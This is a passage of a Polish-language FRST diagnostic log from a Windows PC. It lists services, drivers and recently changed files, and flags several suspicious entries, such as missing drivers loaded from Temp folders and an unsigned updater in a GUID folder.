Agent\AgentSvc.exe [84176 2019-02-19] (Panda Security S.L. -> Panda Security, S.L.) R2 PSUAService; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe [48784 2019-10-16] (Panda Security S.L. -> Panda Security, S.L.) R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [338944 2013-08-11] (IDT, Inc.) [Brak podpisu cyfrowego] S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Brak podpisu cyfrowego] S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-29] (Microsoft Windows -> Microsoft Corporation) [DependOnService: iThemes5]<==== UWAGA S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation) R2 WpSvc; c:\users\byaku\appdata\roaming\360bizhi\lpi\WpSvc.dll [253352 2016-11-17] (Qihoo 360 Software (Beijing) Company Limited -> ) S3 ekrnEpfw; "C:\Program Files\ESET\ESET Smart Security\ekrn.exe" [X] S2 Update Mgr RollAround; "C:\Program Files (x86)\Common Files\2a617352-d396-46a3-a71b-5d89535356cf\updater.exe" [X] <==== UWAGA ===================== Sterowniki (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) S3 AthDfu; C:\Windows\System32\Drivers\AthDfu.sys [55448 2013-08-29] (Atheros Communications Inc. -> Windows (R) Win 7 DDK provider) R3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [132920 2013-03-25] (Motorola Solutions Inc. -> Motorola Solutions, Inc.) R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1366328 2013-03-28] (Motorola Solutions Inc. -> Motorola Solutions, Inc.) S3 lehidmini; C:\Windows\System32\drivers\leath_hid.sys [39704 2013-08-29] (Atheros Communications Inc. -> Atheros) R1 NNSALPC; C:\Windows\System32\DRIVERS\NNSAlpc.sys [111456 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSDNS; C:\Windows\System32\DRIVERS\NNSDns.sys [104728 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSHTTP; C:\Windows\System32\DRIVERS\NNSHttp.sys [212360 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSHTTPS; C:\Windows\System32\DRIVERS\NNSHttps.sys [125864 2019-03-06] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSIDS; C:\Windows\System32\DRIVERS\NNSIds.sys [133056 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSNAHSL; C:\Windows\system32\DRIVERS\NNSNAHSL.sys [95472 2018-07-16] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSPICC; C:\Windows\System32\DRIVERS\NNSPicc.sys [150048 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSPIHSW; C:\Windows\System32\DRIVERS\NNSPihsw.sys [94976 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSPOP3; C:\Windows\System32\DRIVERS\NNSPop3.sys [135640 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSPROT; C:\Windows\System32\DRIVERS\NNSProt.sys [347832 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSPRV; C:\Windows\System32\DRIVERS\NNSPrv.sys [291664 2019-05-30] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSSMTP; C:\Windows\System32\DRIVERS\NNSSmtp.sys [123304 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSSTRM; C:\Windows\System32\DRIVERS\NNSStrm.sys [296320 2019-05-30] (Panda Security S.L. -> Panda Security, S.L.) R1 NNSTLSC; C:\Windows\System32\DRIVERS\NNSTlsc.sys [132544 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.) R2 PSINAflt; C:\Windows\System32\DRIVERS\PSINAflt.sys [197720 2019-06-06] (Panda Security S.L. -> Panda Security, S.L.) R2 PSINFile; C:\Windows\System32\DRIVERS\PSINFile.sys [159832 2019-06-04] (Panda Security S.L. -> Panda Security, S.L.) R1 PSINKNC; C:\Windows\System32\DRIVERS\psinknc.sys [214616 2019-03-04] (Panda Security S.L. -> Panda Security, S.L.) R2 PSINProc; C:\Windows\System32\DRIVERS\PSINProc.sys [146520 2019-06-04] (Panda Security S.L. -> Panda Security, S.L.) R2 PSINProt; C:\Windows\System32\DRIVERS\PSINProt.sys [158808 2019-06-06] (Panda Security S.L. -> Panda Security, S.L.) R2 PSINReg; C:\Windows\System32\DRIVERS\PSINReg.sys [128600 2019-06-04] (Panda Security S.L. -> Panda Security, S.L.) R3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [72280 2017-05-22] (Panda Security S.L. -> Panda Security, S.L.) R3 STHDA; C:\Windows\system32\DRIVERS\stwrt64.sys [551936 2013-08-11] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.) S3 ucdrv; C:\Windows\System32\drivers:ucdrv-x64.sys [0 0000-00-00] (UC Web Inc.) <==== UWAGA (zerobajtowy plik/folder) <==== UWAGA R3 vmulti; C:\Windows\System32\drivers\vmulti.sys [10752 2018-12-11] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation) S1 chhvdfnv; \??\C:\Windows\system32\drivers\chhvdfnv.sys [X] S2 ComputerZLock; \??\C:\Program Files (x86)\LdsLite\ComputerZLock_x64.sys [X] S3 ComputerZ_x64; \??\C:\Program Files (x86)\LdsLite\ComputerZ_x64.sys [X] U2 CWASRE; Brak ImagePath U2 glory; Brak ImagePath S3 moufiltr; \SystemRoot\System32\drivers\moufiltr.sys [X] S1 mwescontroller; system32\drivers\mwescontroller.sys [X] <==== UWAGA S1 p1483448096am; \??\C:\Users\Byaku\AppData\Local\Temp\bk5470.tmp\p1483448096am.sys [X] <==== UWAGA S1 p1484835112am; \??\C:\Users\Byaku\AppData\Local\Temp\bkEDAE.tmp\p1484835112am.sys [X] <==== UWAGA S1 p1484835200am; \??\C:\Users\Byaku\AppData\Local\Temp\bk4138.tmp\p1484835200am.sys [X] <==== UWAGA S1 p1486202128am; \??\C:\Users\Byaku\AppData\Local\Temp\bkC03A.tmp\p1486202128am.sys [X] <==== UWAGA S1 p1486561471am; \??\C:\Users\Byaku\AppData\Local\Temp\bk6057.tmp\p1486561471am.sys [X] <==== UWAGA S1 p1487606898am; \??\C:\Users\Byaku\AppData\Local\Temp\bkA65A.tmp\p1487606898am.sys [X] <==== UWAGA S1 p1487607019am; \??\C:\Users\Byaku\AppData\Local\Temp\bk89FF.tmp\p1487607019am.sys [X] <==== UWAGA U2 snare; Brak ImagePath S3 vhidmini; \SystemRoot\System32\drivers\walvhid.sys [X] U2 WinSnare; Brak ImagePath S1 xuffnqgq; \??\C:\Windows\system32\drivers\xuffnqgq.sys [X] ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) NETSVCx32: HpSvc -> Brak ścieżki do pliku. NETSVCx32: GmSvc -> Brak ścieżki do pliku. NETSVCx32: WpSvc -> C:\users\byaku\appdata\roaming\360bizhi\lpi\WpSvc.dll () ==================== Jeden miesiąc (utworzone) (Wszystkie) ========= (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2021-01-17 13:53 - 2021-01-17 13:58 - 000033535 _____ C:\Users\Byaku\Downloads\FRST.txt 2021-01-17 13:52 - 2021-01-17 13:55 - 000000000 ____D C:\FRST 2021-01-17 13:49 - 2021-01-17 13:50 - 002295296 _____ (Farbar) C:\Users\Byaku\Downloads\FRST64.exe 2021-01-17 13:25 - 2021-01-17 13:25 - 000000000 ____D C:\Users\Byaku\Downloads\ComIntRep_5003 2021-01-14 21:55 - 2021-01-14 21:55 - 003001755 _____ C:\Users\Byaku\Downloads\James Patterson Howard Roughan - Instinct 01 - Instinct retail epub.epub 2021-01-12 15:57 - 2021-01-12 15:57 - 000098663 _____ C:\Users\Byaku\Downloads\rozliczenie roczne 2020 ZUS.pdf 2021-01-11 15:47 - 2021-01-11 15:47 - 000072602 _____ C:\Users\Byaku\Downloads\FS 4_01_2021.pdf 2020-12-29 17:01 - 2020-12-29 17:08 - 000000000 ____D C:\Users\Byaku\AppData\Roaming\Pentablet 2020-12-29 17:01 - 2020-12-29 17:01 - 000000843 _____ C:\Users\Public\Desktop\Pentablet.lnk 2020-12-29 17:01 - 2020-12-29 17:01 - 000000843 _____ C:\ProgramData\Desktop\Pentablet.lnk 2020-12-29 17:01 - 2020-12-29 17:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pentablet 2020-12-29 17:01 - 2019-07-11 13:50 - 000145408 _____ (TODO: <公司名>) C:\Windows\system32\WinTab32.dll 2020-12-29 17:01 - 2019-07-11 13:50 - 000124928 _____ (TODO: <公司名>) C:\Windows\SysWOW64\WinTab32.dll 2020-12-29 17:01 - 2018-12-11 10:03 - 000010752 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\vmulti.sys 2020-12-29 17:01 - 2014-09-17 10:47 - 000007680 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\hidkmdf.sys 2020-12-29 17:00 - 2020-12-29 17:01 - 000000000 ____D C:\Program Files\Pentablet 2020-12-29 16:57 - 2020-12-29 16:57 - 000000000 ____D C:\Users\Byaku\Downloads\XP-PenWin_1.6.4.200810 ==================== Jeden miesiąc (zmodyfikowane) ================== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2021-01-17 09:07 - 2013-11-26 15:08 - 001817498 _____ C:\Windows\system32\PerfStringBackup.INI 2021-01-17 09:07 - 2013-08-23 00:12 - 000801022 _____ C:\Windows\system32\perfh015.dat 2021-01-17 09:07 - 2013-08-23 00:12 - 000160728 _____ C:\Windows\system32\perfc015.dat 2021-01-17 09:07 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf 2021-01-17 09:06 - 2019-10-03 13:31 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData 2021-01-17 09:06 - 2019-10-03 13:31 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData 2021-01-17 09:04 - 2016-12-11 12:51 - 000000000 ____D C:\Users\Byaku\AppData\Roaming\Ludashi 2021-01-17 09:02 - 2016-01-22 01:31 - 000000000 ___RD C:\Users\Byaku\Creative Cloud Files 2021-01-17 09:00 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2021-01-16 12:32 - 2016-05-08 21:42 - 000000000 ____D C:\Users\Byaku\Documents\Biblioteka calibre 2021-01-13 22:41 - 2015-05-04 19:37 - 000000000 ____D C:\Users\Byaku\Downloads\Ebooki 2021-01-13 22:40 - 2018-02-15 22:18 - 000000000 ____D C:\Users\Byaku\Downloads\Ebooki MM do przejrzenia 2021-01-13 10:30 - 2020-06-22 22:16 - 001381693 _____ C:\Users\Byaku\Desktop\gold moon.ai 2021-01-09 10:33 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\system32\NDF 2021-01-02 12:41 - 2016-03-08 15:10 - 000000000 ____D C:\Users\Byaku\Desktop\Mangi na sprzedaż 2020-12-29 17:05 - 2015-03-03 18:23 - 000003598 _____ C:\Windows\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2709180964-3026329352-173763364-1001 2020-12-29 17:01 - 2015-03-03 18:17 - 000000000 ____D C:\Users\Byaku\AppData\Roaming\Adobe 2020-12-29 16:53 - 2013-11-27 08:35 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2020-12-29 16:53 - 2013-08-22 14:36 - 000000000 ____D C:\Windows 2020-12-29 14:56 - 2013-08-22 14:25 - 000000384 _____ C:\Windows\win.ini 2020-12-26 23:36 - 2015-03-06 23:06 - 000000000 ____D C:\Users\Byaku\AppData\Roaming\vlc ==================== Pliki w katalogu głównym wybranych folderów ======== 2015-10-30 01:18 - 2015-10-30 01:18 - 000000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat 2020-06-26 14:46 - 2020-06-26 14:46 - 000000115 _____ () C:\Users\Byaku\haslo..vbs 2017-03-02 15:55 - 2017-05-10 13:21 - 000130650 _____ () C:\Program Files (x86)\metadata 2017-03-02 15:55 - 2017-05-10 13:20 - 000000040 _____ () C:\Program Files (x86)\settings.dat 2016-01-29 19:39 - 2016-01-30 21:53 - 000000132 _____ () C:\Users\Byaku\AppData\Roaming\Adobe PNG Format CS6 Prefs 2016-12-11 13:31 - 2016-12-11 13:31 - 007310848 _____ () C:\Users\Byaku\AppData\Roaming\agent.dat 2016-12-11 13:31 - 2016-12-11 13:31 - 000070704 _____ () C:\Users\Byaku\AppData\Roaming\Config.xml 2016-12-11 13:30 - 2016-12-11 13:29 - 000684544 _____ () C:\Users\Byaku\AppData\Roaming\Danhold.exe 2016-12-11 13:31 - 2016-12-11 13:31 - 001907144 _____ () C:\Users\Byaku\AppData\Roaming\Danhold.tst 2016-12-11 13:29 - 2016-12-11 13:29 - 000018144 _____ () C:\Users\Byaku\AppData\Roaming\InstallationConfiguration.xml 2016-12-11 13:29 - 2016-12-11 13:29 - 000140288 _____ () C:\Users\Byaku\AppData\Roaming\Installer.dat 2016-12-11 13:31 - 2016-12-11 13:31 - 000018432 _____ () C:\Users\Byaku\AppData\Roaming\Main.dat 2016-12-11 13:31 - 2016-12-11 13:31 - 000005568 _____ () C:\Users\Byaku\AppData\Roaming\md.xml 2016-12-11 13:31 - 2016-12-11 13:31 - 000126464 _____ () C:\Users\Byaku\AppData\Roaming\noah.dat 2016-12-11 13:31 - 2016-12-11 13:31 - 000032038 _____ () C:\Users\Byaku\AppData\Roaming\uninstall_temp.ico 2015-05-25 10:37 - 2015-07-15 23:37 - 000000096 _____ () C:\Users\Byaku\AppData\Roaming\WB.CFG 2018-09-29 07:06 - 2018-09-29 07:06 - 000000000 _____ () C:\Users\Byaku\AppData\Local\oobelibMkey.log 2019-10-07 22:46 - 2019-10-07 22:46 - 000000218 _____ () C:\Users\Byaku\AppData\Local\recently-used.xbel 2017-05-11 14:35 - 2017-05-11 14:35 - 000000000 _____ () C:\Users\Byaku\AppData\Local\{FAD5A184-C57E-478A-8159-3C7E25BC5F96} ==================== SigCheck ============================ (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) LastRegBack: 2020-08-23 09:10 ==================== Koniec FRST.txt ========================